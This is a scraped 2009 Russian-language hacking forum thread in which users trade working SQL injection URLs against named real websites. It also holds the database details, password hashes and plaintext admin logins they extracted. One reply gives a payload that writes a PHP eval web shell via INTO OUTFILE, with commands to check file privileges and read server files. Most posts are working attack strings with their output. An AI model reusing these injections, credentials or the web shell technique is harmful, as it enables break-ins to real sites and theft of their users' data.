Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
08.01.2009, 16:57
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
ООО "ММ ПРИС"
Код:
http://www.mmpris.ru/adetails.php?id=-8+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9--
user(): 1gb_mmpris@10.0.1.32_1
version(): 4.1.21-community-max-nt-log
database(): 1gb_mmpris.mht
тИЦ: 180
PR: 4
Oceanworld Manly Australia
Код:
http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
user(): oceanworld@localhost
version(): 5.0.18-nt
database(): oceanworld
тИЦ: 10
PR: 6
|
|
|
08.01.2009, 17:37
|
|
Новичок
Регистрация: 22.12.2008
Сообщений: 11
Провел на форуме:
64392
Репутация:
2
|
|
http://www.pca.org.au/?id=-8+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11,12--
user(): mypca1005@ws-shared-9.private.netregistry.net
version(): 5.0.32-Debian_7etch6-log
database(): pca_pca_org_au
PR: 5
нашёл таблицу tblmemberlogin, в ней одно поле "txtPassword"
в таблице всего два хэша:
b334044a3535f437c14f24c1e76ae3fb
5f4dcc3b5aa765d61d8327deb882cf99  assword
логина нет (толком не искал) Порыл чуть глубже - нашел поинтереснее табличку tbluser
В ней intUserLevel , txtUsername , txtPassword
http://www.pca.org.au/?id=-8+union+select+1,2,concat(intUserLevel,0x3a,txtUse rname,0x3a,txtPassword),4,5,6,7,8,9,10,11,12+from+ tbluser+limit+13,1--
По лимитам вроде 13 юзеров. Пару хэшей расшифровал, но что-то не пускает в админку ... пох 
У меня вот какой вопрос , а точнее ПРОСЬБА !
Может кто-нить показать на примере (любом, хоть одном из тех, что здесь выкладывают), как через скуль залить шелл ? Не через админку , а именно через скуль (into+outfile конструкция вроде используется или как там?).
Инфу почитал на нескольких форумах, но не до конца все понятно ...
Если не трудно кому-нибудь - покажите плиз на примере, как это сделать. Думаю многим полезно будет ...
|
|
|
|
08.01.2009, 20:18
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633
Репутация:
155
|
|
Сообщение от UgMan
Может кто-нить показать на примере (любом, хоть одном из тех, что здесь выкладывают), как через скуль залить шелл ? Не через админку , а именно через скуль (into+outfile конструкция вроде используется или как там?).
хз..по моему это редкость..
надо чтобы был включён файл прив и кавычки не фильтруются и ещё путь к корюн чтобы знать..
в общем примерно так +union+select+'<?php eval($_GET[‘e’]) ?>'+into+outfile+'/путь к корню сайта'--
файл прив проверять так
+union+select+1,file_priv+from+mysql.user--
путь к сайту иногда даётся так +union+select+1,load_file('/')--
иногда может быть в конфиге апача..
забыл в каких местах конфиги хранятся..на форуме есть..
|
|
|
|
08.01.2009, 20:20
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
Сообщение от masternet
файл прив проверять так
+union+select+1,file_priv+from+mysql.user--
Причем mysql.user тоже открыта крайне редко =)
|
|
|
|
08.01.2009, 20:26
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633
Репутация:
155
|
|
Сообщение от prescott
Причем mysql.user тоже открыта крайне редко =)
ага..ток у меня она почти всегда открыта.. 
|
|
|
|
08.01.2009, 18:45
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
UgMan, юзеры которые находятся в tbluser, точнее их пассы подходят к админке.
|
|
|
|
08.01.2009, 19:10
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Код:
http://www.cageprisoners.com/articles.php?id=-27207%20union%20select%201,2,concat(username,0x3a,password),4,5,6%20FROM%20admins%20--
Mr. Admin:QYYoUiD1cbIlTi2jPbgoQ0
Логин : Пассворда
http://www.cageprisoners.com/admin
Но только пасс не подходит.. Мб это хеш я особо в них не шарю может подскажите где расшифровать или хотябы что это за тип хеша. |
|
|
|
08.01.2009, 20:22
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
Код:
http://empireguru.ru/index.html?id=97&parent_id=-2+union+select+1,2,3,4,5,concat(email,name,converge_pass_salt,0x27,converge_pass_hash),7,8+from+ibf_members+m+left+join+ibf_members_converge+mc+ON+(m.email%20=%20mc.converge_email)--
seo@datakit.ru - мыло
SCANER логин
"S"4Y соль
c16aa084c6d6a0b2cf5d69bdc32f4204 кэш
наглядный пример инъекции которая достает пару юзер:пасс из IPB |
|
|
|
08.01.2009, 20:39
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Код:
http://www.franciscansinternational.org/docs/statement.php?id=-464%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20--
|
|
|
|
08.01.2009, 22:07
|
|
Новичок
Регистрация: 07.09.2008
Сообщений: 26
Провел на форуме:
430982
Репутация:
26
|
|
Код:
http://www.cdma.kh.ua/articles/index.php?view=article&id=-999%20union%20select%201,concat(user(),0x3a,version(),0x3a,database()),3
plintys_gsm@localhost:5.0.51a-community-log: plintys_cdma
Код:
http://www.cdma.kh.ua/forum/admin/
login: pv
pass: 2005
Код:
http://www.p-m.com.ua/news/index.php?view=bulletin&id=-999%20union%20select%201,2,3,concat(user(),0x3a,version(),0x3a,database()),5
pminua_pm@localhost:5.0.51a-community-log: pminua_pmcomua
Код:
http://www.m-m.com.ua/article/index.php?view=article&id=-999%20union%20select%201,2,3,concat(user(),0x3a,version(),0x3a,database())
mmcomua_tok@localhost:5.0.51a-community-log:mmcomua_mm
Код:
http://kdsk.com.ua/gallery.php?imID=-999+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6
kdskcom_site@localhost:5.0.51a-community-log:kdskcom_site
Код:
http://www.tet.kharkov.ua/articles/index.php?view=article&id=-999%20union%20select%201,concat(user(),0x3a,version(),0x3a,database()),3
tetkhua_tetkha@localhost:5.0.51a-community-log:tetkhua_tetkha
Код:
http://www.tet.kharkov.ua/forum/admin/
login: tet
pass: tet2008
Код:
http://www.danica-biola.com.ua/resource.php?id_serv=-999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3
danica_db@localhost:5.0.51a-community-log:danica_biolacomua
Код:
http://www.legion.kharkov.ua/publication/?view=publication&id=-999+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database())
legion_val@localhost:5.0.51a-community-log:legion_leg
Код:
http://www.afh.kharkov.ua/catalogue/index.php?id=4+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6
plintys_afh@localhost:5.0.51a-community-log: plintys_afh
Последний раз редактировалось _evgeniy_; 08.01.2009 в 22:10..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид